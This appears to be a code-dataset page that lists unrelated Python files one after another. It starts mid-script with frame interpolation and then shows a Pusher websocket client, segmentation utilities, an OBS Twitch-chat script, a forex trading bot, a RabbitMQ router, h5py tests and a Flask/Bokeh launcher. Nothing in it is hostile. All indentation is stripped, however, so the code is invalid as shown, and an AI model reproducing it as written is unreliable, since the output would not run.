I1_frame_number = I0_frame_number + 1
ratio = frame_value_map[frame_number] - int(frame_value_map[frame_number])
# pprint ('frame_number: %s, value: %s' % (frame_number, frame_value_map[frame_number]))
# pprint ('I0_frame_number: %s, I1_frame_number: %s, ratio: %s' % (I0_frame_number, I1_frame_number, ratio))
I0_image = cv2.imread(src_files.get(I0_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I1_image = cv2.imread(src_files.get(I1_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I0 = torch.from_numpy(np.transpose(I0_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I1 = torch.from_numpy(np.transpose(I1_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I0 = F.pad(I0, padding)
I1 = F.pad(I1, padding)
p = mp.Process(target=make_inference_rational_cpu, args=(model, I0, I1, ratio, output_frame_number, w, h, write_buffer), kwargs = {'scale': args.flow_scale})
p.start()
active_workers.append(p)
if (time.time() - last_thread_time) < (thread_ram / 8):
if sim_workers > 1:
time.sleep(thread_ram/8)
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
output_frame_number += 1
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
# wait for all active worker threads left to finish
for p in active_workers:
p.join()
# send write loop exit code
write_buffer.put((-1, -1))
# it should put IOThreadsFlag to False it return
while(IOThreadsFlag):
time.sleep(0.01)
for p in IOProcesses:
p.join(timeout=8)
for p in IOProcesses:
p.terminate()
p.join(timeout=0)
import hashlib
lockfile = os.path.join('locks', hashlib.sha1(output_folder.encode()).hexdigest().upper() + '.lock')
if os.path.isfile(lockfile):
os.remove(lockfile)
# input("Press Enter to continue...")
sys.exit(0)
|
connection.py
|
import sched
from threading import Thread
from collections import defaultdict
import websocket
import logging
import time
import json
class Connection(Thread):
def __init__(self, event_handler, url, reconnect_handler=None, log_level=None,
daemon=True, reconnect_interval=10, socket_kwargs=None, **thread_kwargs):
self.event_handler = event_handler
self.url = url
self.reconnect_handler = reconnect_handler or (lambda: None)
self.socket = None
self.socket_id = ""
self.event_callbacks = defaultdict(list)
self.disconnect_called = False
self.needs_reconnect = False
self.default_reconnect_interval = reconnect_interval
self.reconnect_interval = reconnect_interval
self.socket_kwargs = socket_kwargs or dict()
self.pong_timer = None
self.pong_received = False
self.pong_timeout = 30
self.bind("pusher:connection_established", self._connect_handler)
self.bind("pusher:connection_failed", self._failed_handler)
self.bind("pusher:pong", self._pong_handler)
self.bind("pusher:ping", self._ping_handler)
self.bind("pusher:error", self._pusher_error_handler)
self.state = "initialized"
self.logger = logging.getLogger(self.__module__) # create a new logger
if log_level:
self.logger.setLevel(log_level)
if log_level == logging.DEBUG:
websocket.enableTrace(True)
# From Martyn's comment at:
# https://pusher.tenderapp.com/discussions/problems/36-no-messages-received-after-1-idle-minute-heartbeat
# "We send a ping every 5 minutes in an attempt to keep connections
# alive..."
# This is why we set the connection timeout to 5 minutes, since we can
# expect a pusher heartbeat message every 5 minutes. Adding 5 sec to
# account for small timing delays which may cause messages to not be
# received in exact 5 minute intervals.
self.connection_timeout = 305
self.connection_timer = None
self.ping_interval = 120
self.ping_timer = None
self.timeout_scheduler = sched.scheduler(
time.time,
sleep_max_n(min([self.pong_timeout, self.connection_timeout, self.ping_interval]))
)
self.timeout_scheduler_thread = None
Thread.__init__(self, **thread_kwargs)
self.daemon = daemon
self.name = "PysherEventLoop"
def bind(self, event_name, callback, *args, **kwargs):
"""Bind an event to a callback
:param event_name: The name of the event to bind to.
:type event_name: str
:param callback: The callback to notify of this event.
"""
self.event_callbacks[event_name].append((callback, args, kwargs))
def disconnect(self, timeout=None):
self.needs_reconnect = False
self.disconnect_called = True
if self.socket:
self.socket.close()
self.join(timeout)
def reconnect(self, reconnect_interval=None):
if reconnect_interval is None:
reconnect_interval = self.default_reconnect_interval
self.logger.info("Connection: Reconnect in %s" % reconnect_interval)
self.reconnect_interval = reconnect_interval
self.needs_reconnect = True
if self.socket:
self.socket.close()
def run(self):
self._connect()
def _connect(self):
self.state = "connecting"
self.socket = websocket.WebSocketApp(
self.url,
on_open=self._on_open,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close
)
self.socket.run_forever(**self.socket_kwargs)
while self.needs_reconnect and not self.disconnect_called:
self.logger.info("Attempting to connect again in %s seconds."
% self.reconnect_interval)
self.state = "unavailable"
time.sleep(self.reconnect_interval)
# We need to set this flag since closing the socket will set it to
# false
self.socket.keep_running = True
self.socket.run_forever(**self.socket_kwargs)
def _on_open(self):
self.logger.info("Connection: Connection opened")
# Send a ping right away to inform that the connection is alive. If you
# don't do this, it takes the ping interval to subcribe to channel and
# events
self.send_ping()
self._start_timers()
def _on_error(self, error):
self.logger.info("Connection: Error - %s" % error)
self.state = "failed"
self.needs_reconnect = True
def _on_message(self, message):
self.logger.info("Connection: Message - %s" % message)
# Stop our timeout timer, since we got some data
self._stop_timers()
params = self._parse(message)
if 'event' in params.keys():
if 'channel' not in params.keys():
# We've got a connection event. Lets handle it.
if params['event'] in self.event_callbacks.keys():
for func, args, kwargs in self.event_callbacks[params['event']]:
try:
func(params['data'], *args, **kwargs)
except Exception:
self.logger.exception("Callback raised unhandled")
else:
self.logger.info("Connection: Unhandled event")
else:
# We've got a channel event. Lets pass it up to the pusher
# so it can be handled by the appropriate channel.
self.event_handler(
params['event'],
params['data'],
params['channel']
)
# We've handled our data, so restart our connection timeout handler
self._start_timers()
def _on_close(self, *args):
self.logger.info("Connection: Connection closed")
self.state = "disconnected"
self._stop_timers()
@staticmethod
def _parse(message):
return json.loads(message)
def _stop_timers(self):
for event in self.timeout_scheduler.queue:
self._cancel_scheduler_event(event)
def _start_timers(self):
self._stop_timers()
self.ping_timer = self.timeout_scheduler.enter(self.ping_interval, 1, self.send_ping)
self.connection_timer = self.timeout_scheduler.enter(self.connection_timeout, 2, self._connection_timed_out)
if not self.timeout_scheduler_thread:
self.timeout_scheduler_thread = Thread(target=self.timeout_scheduler.run, daemon=True, name="PysherScheduler")
self.timeout_scheduler_thread.start()
elif not self.timeout_scheduler_thread.is_alive():
self.timeout_scheduler_thread = Thread(target=self.timeout_scheduler.run, daemon=True, name="PysherScheduler")
self.timeout_scheduler_thread.start()
def _cancel_scheduler_event(self, event):
try:
self.timeout_scheduler.cancel(event)
except ValueError:
self.logger.info('Connection: Scheduling event already cancelled')
def send_event(self, event_name, data, channel_name=None):
"""Send an event to the Pusher server.
:param str event_name:
:param Any data:
:param str channel_name:
"""
event = {'event': event_name, 'data': data}
if channel_name:
event['channel'] = channel_name
self.logger.info("Connection: Sending event - %s" % event)
try:
self.socket.send(json.dumps(event))
except Exception as e:
self.logger.error("Failed send event: %s" % e)
def send_ping(self):
self.logger.info("Connection: ping to pusher")
try:
self.socket.send(json.dumps({'event': 'pusher:ping', 'data': ''}))
except Exception as e:
self.logger.error("Failed send ping: %s" % e)
self.pong_timer = self.timeout_scheduler.enter(self.pong_timeout, 3, self._check_pong)
def send_pong(self):
self.logger.info("Connection: pong to pusher")
try:
self.socket.send(json.dumps({'event': 'pusher:pong', 'data': ''}))
except Exception as e:
self.logger.error("Failed send pong: %s" % e)
def _check_pong(self):
self._cancel_scheduler_event(self.pong_timer)
if self.pong_received:
self.pong_received = False
else:
self.logger.info("Did not receive pong in time. Will attempt to reconnect.")
self.state = "failed"
self.reconnect()
def _connect_handler(self, data):
parsed = json.loads(data)
self.socket_id = parsed['socket_id']
self.state = "connected"
if self.needs_reconnect:
# Since we've opened a connection, we don't need to try to reconnect
self.needs_reconnect = False
self.reconnect_handler()
self.logger.debug('Connection: Establisheds reconnection')
else:
self.logger.debug('Connection: Establisheds first connection')
def _failed_handler(self, data):
self.state = "failed"
def _ping_handler(self, data):
self.send_pong()
# Restart our timers since we received something on the connection
self._start_timers()
def _pong_handler(self, data):
self.logger.info("Connection: pong from pusher")
self.pong_received = True
def _pusher_error_handler(self, data):
if 'code' in data:
try:
error_code = int(data['code'])
except:
error_code = None
if error_code is not None:
self.logger.error("Connection: Received error %s" % error_code)
if (error_code >= 4000) and (error_code <= 4099):
# The connection SHOULD NOT be re-established unchanged
self.logger.info("Connection: Error is unrecoverable. Disconnecting")
self.disconnect()
elif (error_code >= 4100) and (error_code <= 4199):
# The connection SHOULD be re-established after backing off
self.reconnect()
elif (error_code >= 4200) and (error_code <= 4299):
# The connection SHOULD be re-established immediately
self.reconnect(0)
else:
pass
else:
self.logger.error("Connection: Unknown error code")
else:
self.logger.error("Connection: No error code supplied")
def _connection_timed_out(self):
self.logger.info("Did not receive any data in time. Reconnecting.")
self.state = "failed"
self.reconnect()
def sleep_max_n(max_sleep_time):
def sleep(time_to_sleep):
time.sleep(min(max_sleep_time, time_to_sleep))
return sleep
|
utils.py
|
import numpy as np
import math
import os
from os.path import exists, join, split
from PIL import Image
import torch
import shutil
import threading
from torch import nn
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n=19):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class MaskedMSE(nn.Module):
def __init__(self):
super(MaskedMSE, self).__init__()
self.criterion = nn.MSELoss()
def forward(self, input, target, mask_a, mask_b):
self.loss = self.criterion(input * mask_a, target * mask_b)
return self.loss
def to_np(x):
return x.cpu().numpy()
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def accuracy_depth(output, target, mask):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = torch.masked_select(pred, mask.byte())
target = torch.masked_select(target, mask.byte())
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
def fill_conv_weights(m):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
|
chat.py
|
#!/usr/bin/python3
"""
The MIT License (MIT)
Copyright (c) 2020 WesleyCSJ - wesleyjr10@gmail.com
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import obspython as obs
import socket
import threading
import re
HOST = "irc.chat.twitch.tv" # The remote host
PINGPONG_SERVER = ":tmi.twitch.tv"
PORT = 6667 # The same port as used by the server
STOP_SIGNAL = False
SOCKET = None
# RESOURCES OF COLUMN AND LINE SIZE
TEXTSOURCE_BUFFER = []
CONNECTBUTTON_RESOURCE = None
COLUMN_RESOURCE = None
COLUMN_VALUE = 1
LINE_RESOURCE = None
LINE_VALUE = 1
OAUTH_RESOURCE = None
OAUTH_VALUE = ""
USERNAME_RESOURCE = None
USERNAME_VALUE = ""
CHANNEL_RESOURCE = None
CHANNEL_VALUE = ""
TEXTSOURCE_VALUE = ""
def socket_connect(property, obj):
global SOCKET
try:
SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SOCKET.connect((HOST, PORT))
SOCKET.send(bytes("PASS {}\r\n".format (OAUTH_KEY), "UTF-8"))
SOCKET.send(bytes("NICK {}\r\n".format (USERNAME_VALUE) , "UTF-8"))
SOCKET.send(bytes("JOIN #{}\r\n".format(CHANNEL_VALUE) , "UTF-8"))
start_thread()
except OSError:
print("OSError: Transport endpoint not connected")
except ConnectionRefusedError:
print("ConnectionRefusedError: Could not connect to Node.js server.")
def start_thread():
print("Starting Thread")
global STOP_SIGNAL
STOP_SIGNAL = True
try:
RECEIVE_THREAD.start()
except:
print("ERROR: Could not start the chat service.")
def thread_data(name):
source = obs.obs_get_source_by_name(TEXTSOURCE_VALUE)
button = obs.obs_get_source_by_name("btn_connect")
print("Started the chat service.")
while STOP_SIGNAL:
data = None
try:
data = SOCKET.recv(1024).decode("utf-8")
if not data:
break
except:
print("ERROR: Non valid data received to be parsed.")
break
#Parses the IRC line and returns a dictionary with the command
content = parse_message(data)
if not content['command'] == None:
if content['command'] == "PING":
SOCKET.sendall(bytes("PONG {}\r\n".format(PINGPONG_SERVER),"UTF-8"))
elif content['command'] == "PRIVMSG":
append_buffer(source, "{}: {}".format(content['username'], content['message']))
obs.obs_source_release(source)
print("Stopping the chat service.")
RECEIVE_THREAD = threading.Thread(target=thread_data, args=(1,))
def parse_message(data):
commandDict = dict()
msgRAW = data.strip()
if (msgRAW == "PING {}".format(PINGPONG_SERVER)):
commandDict["command"] = "PING"
return commandDict
msgCommand = msgRAW.split(":")[1].split(" ")[1]
msgContent = msgRAW.split(":")[2]
if msgCommand == "PRIVMSG":
username = msgRAW.split(":")[1].split(" ")[0].split("!")[0]
username = "@{}".format(username)
commandDict[ "command" ] = "PRIVMSG"
commandDict[ "username"] = username
commandDict[ "message" ] = msgContent
else:
commandDict["command"] = None
return commandDict
def append_buffer(source, data):
textData = data
lineBuffer = ""
if (len(textData) <= COLUMN_SIZE):
append_fixedSizeText(TEXTSOURCE_BUFFER, textData)
else:
iterations = int(len(textData) / COLUMN_SIZE)
odd_slices = (len(textData) > ((len(textData) % COLUMN_SIZE) * iterations))
for i in range(0, iterations):
firstPos = (i * COLUMN_SIZE)
lastPos = (firstPos + COLUMN_SIZE)
slicedLine = textData[firstPos:lastPos]
append_fixedSizeText(TEXTSOURCE_BUFFER, slicedLine)
if (odd_slices):
firstPos = (iterations * COLUMN_SIZE)
append_fixedSizeText(TEXTSOURCE_BUFFER, textData[firstPos:])
while (len(TEXTSOURCE_BUFFER) > LINE_SIZE):
TEXTSOURCE_BUFFER.pop(0)
render_textSource(source)
def append_fixedSizeText(array, data):
fixedData = data.lstrip()
if (len(fixedData) < COLUMN_SIZE):
while (len(fixedData) < COLUMN_SIZE):
fixedData = fixedData + " "
array.append(fixedData)
def render_textSource(source):
textData = ""
for lineCounter in range(0, len(TEXTSOURCE_BUFFER)):
textData = textData + TEXTSOURCE_BUFFER[lineCounter]
if (lineCounter != (len(TEXTSOURCE_BUFFER) - 1)):
textData = textData + "\n"
settings = obs.obs_data_create()
obs.obs_data_set_string(settings, "text", textData)
obs.obs_source_update(source, settings)
obs.obs_data_release(settings)
# OBS Script Functions
def script_properties():
global CONNECTBUTTON_RESOURCE
props = obs.obs_properties_create()
sources = obs.obs_enum_sources()
CONNECTBUTTON_RESOURCE = obs.obs_properties_add_button(props, "btn_connect", "Connect", socket_connect)
source_list = obs.obs_properties_add_list(props, "TEXT_SOURCE", "Text source", obs.OBS_COMBO_TYPE_EDITABLE, obs.OBS_COMBO_FORMAT_STRING)
if sources is not None:
for source in sources:
source_id = obs.obs_source_get_unversioned_id(source)
if source_id == "text_gdiplus" or source_id == "text_ft2_source":
name = obs.obs_source_get_name(source)
obs.obs_property_list_add_string(source_list, name, name)
obs.source_list_release(sources)
COLUMN_RESOURCE = obs.obs_properties_add_int (props, "COLUMN_SIZE", "Column Size", 1, 100, 1)
LINE_RESOURCE = obs.obs_properties_add_int (props, "LINE_SIZE", "Line Size", 1, 100, 1)
USERNAME_RESOURCE = obs.obs_properties_add_text (props, "USERNAME_VALUE", "Username", obs.OBS_TEXT_DEFAULT)
CHANNEL_RESOURCE = obs.obs_properties_add_text (props, "CHANNEL_VALUE", "Channel", obs.OBS_TEXT_DEFAULT)
OAUTH_RESOURCE = obs.obs_properties_add_text (props, "OAUTH_VALUE", "OAUTH Key", obs.OBS_TEXT_PASSWORD)
return props
def script_update(settings):
global COLUMN_SIZE
global LINE_SIZE
global USERNAME_VALUE
global CHANNEL_VALUE
global OAUTH_KEY
global TEXTSOURCE_VALUE
COLUMN_SIZE = obs.obs_data_get_int (settings, "COLUMN_SIZE" )
LINE_SIZE = obs.obs_data_get_int (settings, "LINE_SIZE" )
USERNAME_VALUE = obs.obs_data_get_string (settings, "USERNAME_VALUE")
USERNAME_VALUE = USERNAME_VALUE.lower()
CHANNEL_VALUE = obs.obs_data_get_string (settings, "CHANNEL_VALUE")
CHANNEL_VALUE = CHANNEL_VALUE.lower()
OAUTH_KEY = obs.obs_data_get_string (settings, "OAUTH_VALUE" )
TEXTSOURCE_VALUE = obs.obs_data_get_string (settings, "TEXT_SOURCE" )
def script_unload():
global STOP_SIGNAL
STOP_SIGNAL = False
if not SOCKET == None:
SOCKET.shutdown(0)
SOCKET.close()
print("Chat script unload.")
|
trade.py
|
from multiprocessing import Queue, Process
from online_prediction import online_prediction
from robot import Robot
import torch
from util import IO, Norm, interest_margin
from datetime import datetime
import time
from momentum_robot import MRobot
from base_robot import TableRobot, ProbRobot
from decision_maker import DecisionMaker, DecisionWriter
def data_transform(data):
price = data[0]
diff = data[1]
acc = data[2]
feature = []
for p, d, a in zip(price, diff, acc):
if p is None:
exp = 100
conf = 100
elif d is None:
exp = 100
conf = a/p
elif a is None:
exp = d/p
conf = 100
else:
exp = d/p
conf = a/p
feature.append(exp)
feature.append(conf)
return feature
def main():
################### define robot ################
# name = 'EURUSD'
"""
feature_bit = [6, 7, 8, 9, 10, 11, 12, 13]
n_features = len(feature_bit)
bob = Robot(name, input_dim=n_features)
bob.load(fn='6_13_600l')
"""
bob = ProbRobot('EURUSD')
################### init local param ############
# feature_con = torch.Tensor()
q = Queue()
p = Process(target=online_prediction, args=(q,))
p.start()
IO.clear_data('workspace/log/available.log')
# dmaker = DecisionMaker()
# prof_limit = 2*10**-4
# loss_limit = 10**-3
history = []
IO.write_request(['search index', 'open price'])
open_price = IO.get_response()['open price']
IO.close_response()
bob.set_opening_price(open_price)
DecisionWriter.clear_decision()
pre_decision = 'close'
cnt = 0
################ loops ##################
while True:
if q.empty():
time.sleep(0.1)
continue
origin, price = q.get()
if price is None:
time.sleep(0.1)
continue
# price_diff = origin[1]
history.append(price)
if len(history) > 1000:
history = history[-1000:]
cnt += 1
# print(cnt)
"""
feature = data_transform(origin)
feature = torch.Tensor(feature).reshape(1, 1, -1)
feature = Norm.abs_max_no_bias(feature)
feature = feature[:, :, feature_bit]
feature_con = torch.cat((feature_con, feature), dim=0)
feature_con = feature_con[-600:]
if len(feature_con) < 240:
continue
"""
if IO.load_prof_loss() > 0.000000000001:
continue
# diff_in_5_min = price_diff[5]
"""
if diff_in_5_min is None:
continue
"""
# decision = dmaker.from_rnn_feature(diff_in_5_min)
# print(decision)
"""
decision = bob.predict(feature_con)
decision = decision.reshape(-1).tolist()
decision = dmaker.max_out(decision)
print(decision)
"""
# dmaker.write_for_rnn_model(price, prof_limit, loss_limit)
bob.calc_avg_price(history, period=100)
res = bob.make_decision(price)
if res is not None:
decision, prof_lim, loss_lim = res
if decision == pre_decision:
DecisionWriter.clear_decision()
pre_decision = 'close'
else:
DecisionWriter.write_decision_with_limit(price, decision, prof_lim, loss_lim)
pre_decision = decision
time.sleep(3)
if __name__ == '__main__':
# load_prof()
main()
|
DataMessageRouter.py
|
from Messenger import Messenger
from db import Database as DB
from multiprocessing import Process
import json
class DataMessageRouter(object):
def __init__(self, host):
self._messenger = Messenger(host)
self._db = DB()
self._messenger.wait(self.post, 'post_data')
# self._messenger.wait(self.update, 'update_data')
self._messenger.wait(self.get, 'get_data')
# self._messenger.wait(self.delete, 'delete_data')
self._messenger.consume()
def post(self, channel, method, properties, body):
p = Process(target=self._post, args=(channel, method, properties, body))
p.start()
p.join()
def _post(self, channel, method, properties, body):
data = json.loads(body.decode("utf-8"))
self._db.insert(data['table'], **data['data'])
# process completed, send acknowledgment
channel.basic_ack(delivery_tag=method.delivery_tag)
message = json.dumps({"success": True})
self._messenger.respond(channel, properties, message)
#
# def update(self, channel, method, properties, body):
# p = Process(target=self._update, args=(self, channel, method, properties, body))
# p.start()
# p.join()
#
# def _update(self, channel, method, properties, body):
# data = json.loads(body)
# self._data_manager.update(body)
#
# # process completed, send acknowledgment
# channel.basic_ack(delivery_tag=method.delivery_tag)
def get(self, channel, method, properties, body):
p = Process(target=self._get, args=(channel, method, properties, body))
p.start()
p.join()
def _get(self, channel, method, properties, body):
data = json.loads(body.decode("utf-8"))
message = json.dumps(self._db.select(data['table'], *data['columns'], **data["where"]))
print(message)
self._messenger.respond(channel, properties, message)
# process completed, send acknowledgment
channel.basic_ack(delivery_tag=method.delivery_tag)
# def delete(self, channel, method, properties, body):
# p = Process(target=self._delete, args=(self, channel, method, properties, body))
# p.start()
# p.join()
#
# def _delete(self, channel, method, properties, body):
# data = json.loads(body.decode("utf-8"))
# self._data_manager.delete(data["data_id"])
# # process completed, send acknowledgment
# message = {
# "success": True,
# }
# message = json.dumps(message)
# self._messenger.respond(channel, properties, message)
# channel.basic_ack(delivery_tag=method.delivery_tag)
def main():
# todo create multiple threads
p = DataMessageRouter('rabbitmq')
if __name__ == '__main__':
main()
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Tests the h5py.File object.
"""
from __future__ import absolute_import
import threading
import h5py
from ..common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from membership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
import threading
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
run.py
|
"""
Start Application Sequence:
1) bind sockets for flask to bokeh communications
2) start bokeh server (Tornado) running bokeh bkapp
3) start flask server (Tornado) running flask app
"""
import time
import logging
from threading import Thread
from app import start_tornado
from bkapp import (
bk_worker,
get_sockets
)
from config import (
BOKEH_URL,
FLASK_URL
)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
# get sockets, so bkapp and app can talk
bk_sockets, bk_port = get_sockets()
# start bokeh sever
t1 = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True)
t1.start()
bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port))
log.info("Bokeh Server App Running at: %s", bokeh_url)
# start flask server
t2 = Thread(target=start_tornado, daemon=True)
t2.start()
log.info("Flask + Bokeh Server App Running at: %s", FLASK_URL)
# loop for ever
while True:
time.sleep(0.05)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.